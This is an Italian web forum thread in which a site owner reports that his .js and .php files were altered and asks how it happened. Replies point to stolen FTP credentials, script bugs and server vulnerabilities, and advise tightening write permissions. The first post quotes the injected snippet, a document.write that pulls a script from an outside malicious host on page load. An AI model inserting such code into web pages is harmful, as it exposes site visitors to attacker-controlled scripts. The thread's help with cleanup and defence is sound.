Visualizzazione dei risultati da 1 a 3 su 3
  1. #1

    Virus su siti web! Possibile?!?

    Buongiorno a tutti, questo caso è davvero misterioso, ma sono sicuro che ci sia una spiegazione logica, infatti volevo capire come sia potuto capitare che acuni file (file .js, .php)sui miei siti web, siano stati modificati introducendo questa porzione di codice direttamente sulle pagine!!!! di seguito il codice "Virus":

    /*148a41*/
    document.write('<script type="text/ja' + 'vascript" src="http://www.sitowebmaligno.com/1/ad.php?id=10" name="umtz10"></s' + 'cript>');
    /*/148a41*/

    In poche parole, "grazie" a questa porzione di codice i siti web presentavano problemi di visualizzazione (slide show, zoom su foto,ecc...) ...

    Non capisco come questo virus sia potuto accedere ai siti web?!?!
    A qualcuno di Voi è capitato?!?

    Per evitare in futuro che si ripresenti, cosa bisogna fare..?!?!?

    Ho dovuto sostituire tutti i file dei siti web, grazie ai backup...

    So benissimo, che il mio FTP è protetto da psw, infatti lo subito sotituita con altra psw, il punto è che non comprendo come abbia fatto a conoscere le credenziali di accesso per ftp....

    Comunque io possiedo un iMac con OSX versione 10.8.2

    P.S.: Dobbiamo evitare che questo virus si propaghi

    Grazie

    Simone

  2. #2
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    Sì succede... le cause possono essere varie... virus che rubano le credenziali di accesso al server FTP quando ci si connette... vulnerabilità presente sul sito che consente la modifica delle pagine... vulnerabilità del server...
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  3. #3
    Utente di HTML.it L'avatar di homerbit
    Registrato dal
    Dec 2005
    residenza
    Roma
    Messaggi
    1,380
    le cause principali, di solito, sono bugs di qualche script che permette l'inserimento di codice malevolo, oppure server vulnerabili.
    Solitamente questi codici malevoli vengono scritti su file html e cmq su tutti quei files e cartelle che hanno i permessi di scrittura....quindi se non sono necessari al funzionamento del sito sempre meglio disabilitare i permessi. Poi tenere aggiornati gli eventuali "script di terzi"
    If you think your users are idiots, only idiots will use it. DropBox

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.